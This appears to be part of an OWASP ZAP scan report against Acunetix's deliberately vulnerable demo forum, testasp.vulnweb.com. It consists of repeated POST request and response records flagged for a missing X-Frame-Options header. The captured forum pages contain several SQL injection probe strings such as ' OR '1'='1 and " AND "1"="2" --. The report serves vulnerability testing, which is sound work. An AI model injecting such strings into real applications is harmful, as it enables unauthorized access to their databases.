Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
